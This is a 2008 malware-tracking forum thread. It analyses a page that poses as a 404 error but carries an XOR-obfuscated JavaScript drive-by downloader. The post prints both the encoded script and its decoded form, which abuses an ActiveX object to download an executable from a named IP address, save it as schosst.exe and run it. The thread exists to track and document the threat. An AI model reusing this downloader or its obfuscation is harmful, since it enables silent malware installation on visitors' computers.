Author Topic: 124.217.252.62  (Read 5555 times)

0 Members and 1 Guest are viewing this topic.

July 10, 2008, 01:56:43 am
Read 5555 times

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Ref:
http://spywarewarrior.com/viewtopic.php?t=28654
http://www.spywarewarrior.com/viewtopic.php?p=184500

Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.0 Results
Source code for: http://veryblomar.com/vb/in.cgi?2
Server IP: 124.217.252.57 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 09 July 2008
Time: 22:57:10:57
*****************************************************************
<html>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /index.php was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
</body></html><script language=JavaScript>str = "qnfo`mh)(: gtobuhno!qnfo`mh)(!z w`s!vldoeds!<!enbtldou/bsd`udDmdldou)&nckdbu&(: vldoeds/rdu@uushctud)&he&-&vldoeds&(: vldoeds/rdu@uushctud)&bm`rrhe&-&b&*&m&*#rhe;C#*#E8#*&7B447,74&*#@2,00#*&E1,892@,1&*#1B#*&15G&*#B38#*&D27&(: usx!z w`s!ppppp!<!vldoeds/Bsd`udNckdbu)&l&*#ry#*&lm3&*#/#*&Y&*#LM#*&I&*&UUQ&-&&(: w`s!vvvvv!<!vldoeds/Bsd`udNckdbu)#Ri#*#dmm/@#*#q#*#qmhb`#*#uhno#-&&(: w`s!ddddd!<!vldoeds/Bsd`udNckdbu)&`&*&e&*#nec/#*&ru&*#s#*&d`l&-&&(: usx!z!ddddd/uxqd!<!0: ppppp/nqdo)&F&*#D#*&U&-&iuuq;..035/306/343/73.{hcodvr.{hcodvr/bnl.yr.mn`e/qiq&-g`mrd(: ppppp/rdoe)(:!ddddd/nqdo)(: ddddd/Vshud)ppppp/sdrqnordCnex(: w`s!hlx`!<!&/..//..rbinrru/dyd&: ddddd/R`wdUnGhmd)hlx`-3(: ddddd/Bmnrd)(: |!b`ubi)d(!z| usx!z!vvvvv/ridmmdydbtud)hlx`(:!|!b`ubi)d(!z|| b`ubi)d(z||";str2 = "";for (i = 0; i < str.length; i ++) { str2 = str2 + String.fromCharCode (str.charCodeAt (i) ^ 1); }; eval (str2);</script></html>

Decodes to;

Code: [Select]
pognali();
function pognali() {
var wmender = document.createElement('object');
wmender.setAttribute('id','wmender');
wmender.setAttribute('classid','c'+'l'+"sid:B"+"D9"+'6C556-65'+"A3-11"+'D0-983A-0'+"0C"+'04F'+"C29"+'E36');
try {
var qqqqq = wmender.CreateObject('m'+"sx"+'ml2'+"."+'X'+"ML"+'H'+'TTP','');
var wwwww = wmender.CreateObject("Sh"+"ell.A"+"p"+"plica"+"tion",'');
var eeeee = wmender.CreateObject('a'+'d'+"odb."+'st'+"r"+'eam','');
try { eeeee.type = 1;
qqqqq.open('G'+"E"+'T','http://124.217.252.62/~zibnews/zibnews.com/xs/load.php',false);
qqqqq.send(); eeeee.open();
eeeee.Write(qqqqq.responseBody);
var imya = './/..//schosst.exe';
eeeee.SaveToFile(imya,2);
eeeee.Close();
} catch(e) {}
try { wwwww.shellexecute(imya); } catch(e) {}}
catch(e){}}

124.217.252.62 = Est Domains

http://www.virustotal.com/analisis/411ea94ff318083af970ae3d5d6f48d2
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

July 11, 2008, 10:11:15 pm
Reply #1

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964
Thank you.